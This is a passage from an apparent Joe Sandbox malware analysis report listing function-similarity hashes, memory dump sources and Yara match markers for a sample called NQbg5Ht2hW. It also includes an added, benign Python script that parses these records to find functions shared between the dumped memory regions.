                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                        • Instruction ID: 0d86cffbea82b53fe675f2a5388cedad65503f072fbff0fa05e60698cc6132c7
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: 7F01F272B006008FDF21DF68D804BEA33E5FB86306F0544A4D90A972C6E3B8A9C58BC0
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
• Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
• Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
• Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
• Instruction ID: 416163330716df38245bf4347807bdfd0ebb9064b661d12f5678d1507e01f6a0
• Opcode Fuzzy Hash: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
• Instruction Fuzzy Hash: 97F0DAB2D00614DFDF40EA98CC06E9A77B9BF0A320F080490F508FB261DA36FD508B96
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
• Instruction ID: 3bf5c7375b4945d28089649ae12b6221bc3288972dc64d60e63df592cf9a44f8
• Opcode Fuzzy Hash: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
• Instruction Fuzzy Hash: B0E0DFEFE556601393188A214D01126B193BFD763172AE4748E8673706EA35AC0B81D4
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
• Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
• Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
• Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
• Instruction ID: fc80778cd1c7dda6cd4550bba5988e30f40cc60b3e6593792e524e76bf9ff5dc
• Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
• Instruction Fuzzy Hash: 76E0E575C11110EFDB107B51EC02A1C7AB2AB62302B471135E448A7231EF365A2AEB5D
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
• Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
• Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
• Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
• Instruction ID: 4b01befefd95af8d9f86ef20581f0273fd01e56afb6de13ef707199e357cfaf6
• Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
• Instruction Fuzzy Hash: 5BD02B1984C823931F190D14811013597132A03300B8E839088C07F743C51ACC0B12D4
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
• Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
• Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
• Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                        • Instruction ID: f936f75c28aff45e7e5a90233e76c396396f850400af72d052505152adfe5083
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39D05E72858244EBD9409B00DC02B6AB3B9FF4A714F041524B988B10A1E726EA288757
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                        • Instruction ID: 37f14cdf6497b575d2c06cd584a2f5d2e2440587faefa6f38c3bedc463c8a9e8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8D0127BF821008B9B099F14DD43B756A63A7C770470CE1348905D3348EE3DD45A800E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                        • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                        • Instruction ID: 72197a89f0db8906162c4e7b1cd8ff8a0044b6389847668ed9cbbad427b51869
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9B092B1C02C20CB96523F242C068EAB6242E13300F042030E90626242BE3BD26A449F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                        • Instruction ID: befaae0d9a7f82cd18c17594d87387b8e72288341b7913c4274c2d377cc7630f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AB012E0C04500C7D9009F245C05871A23C5707210F003420D008E7102E535D040410E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction ID: c060d876662498a4815d17518034cfcb82f8cb59c2ac90140c62c8288ce4d19d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB41E860108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D519CB66
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                        • Instruction ID: 20dc27d1315411c15c8b50148f63f638e38eb20f04e979edfa943df1cb0dc40e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F41097010C7C18AD3659B28849878BBFE16B96314F885A9CE6E94B3E2C7798445C753
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                        • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                        • Instruction ID: 858766d63f7960a57f809a205ec19ffad2c3a6880a70945224e3cbadc4e57491
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F410B7000D7C19AD3A59B28849874FBFE06BA7314F885A9CF6E84B3E2C7798449C753
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                        • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
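The records above list the same Opcode ID (f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84) once in the 00400000 dump (based on PE: true) and once in the 00710000 dump (based on PE: false), with different Instruction IDs and Instruction Fuzzy Hashes. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses records in the plain-text layout shown here (the three records embedded as input are copied from this section) and lists Opcode IDs that occur in more than one memory dump. The nibble-difference count is a crude positional comparison of two hex strings, an assumption of this example and not Joe Sandbox's own similarity metric.

```python
# Added example (not from the Joe Sandbox report): parse function-similarity
# records and find Opcode IDs present in more than one memory dump.
import re
from collections import defaultdict

# Constructed input: three records copied from the report section above.
SAMPLE = """\
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
• Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
• Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
• Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
• Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
• Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
• Instruction ID: c060d876662498a4815d17518034cfcb82f8cb59c2ac90140c62c8288ce4d19d
• Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
• Instruction Fuzzy Hash: AB41E860108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D519CB66
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
• Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
• Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
• Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
• Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
"""

FIELD_RE = re.compile(r"^(?:•\s*)?([^:]+): (.*)$")
SOURCE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


def parse_records(text):
    """One dict per 'Similarity' block; the Source File line is split into Offset / Based on PE."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line == "Similarity":
            records.append({})
        elif records and (m := FIELD_RE.match(line)):
            key, value = m.groups()
            if key == "Source File":
                off, pe = SOURCE_RE.search(value).groups()
                records[-1].update({"Offset": off, "Based on PE": pe == "true"})
            else:
                records[-1][key] = value
    return records


def shared_across_dumps(records):
    """Opcode IDs seen at more than one dump offset, i.e. the same function body
    present both in the PE image region and in a non-PE region."""
    offsets = defaultdict(set)
    for rec in records:
        offsets[rec["Opcode ID"]].add(rec["Offset"])
    return sorted(oid for oid, offs in offsets.items() if len(offs) > 1)


def nibble_differences(hash_a, hash_b):
    """Count positions where two equal-length hex strings differ. Assumption: a
    crude positional comparison, not Joe Sandbox's own similarity metric."""
    if len(hash_a) != len(hash_b):
        raise ValueError("hashes must have equal length")
    return sum(x != y for x, y in zip(hash_a.upper(), hash_b.upper()))


def instruction_hash_deltas(records):
    """Nibble differences between the Instruction Fuzzy Hashes of each shared Opcode ID."""
    hashes = defaultdict(list)
    for rec in records:
        hashes[rec["Opcode ID"]].append(rec["Instruction Fuzzy Hash"])
    return {oid: nibble_differences(*hashes[oid][:2]) for oid in shared_across_dumps(records)}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records; shared:", shared_across_dumps(recs), instruction_hash_deltas(recs))
```

Run against the full report text, the same grouping shows which functions of the on-disk image reappear in the non-PE region at 00710000 and how far their instruction-level hashes drift, which is the evidence behind the unpacking signatures listed in the overview.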
Similarity
• API ID: Variant$ClearInit
• String ID: A$e$e$n$p$p$v$w$z$z
• API String ID: 2610073882-1114116150
• Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
• Instruction ID: bd7c222b05b752d076fca80953065e5b58cd1f06b5e0a7d91cd8e3a3a208c81f
• Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
• Instruction Fuzzy Hash: E641373160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794505C763
APIs
Strings
Memory Dump Source
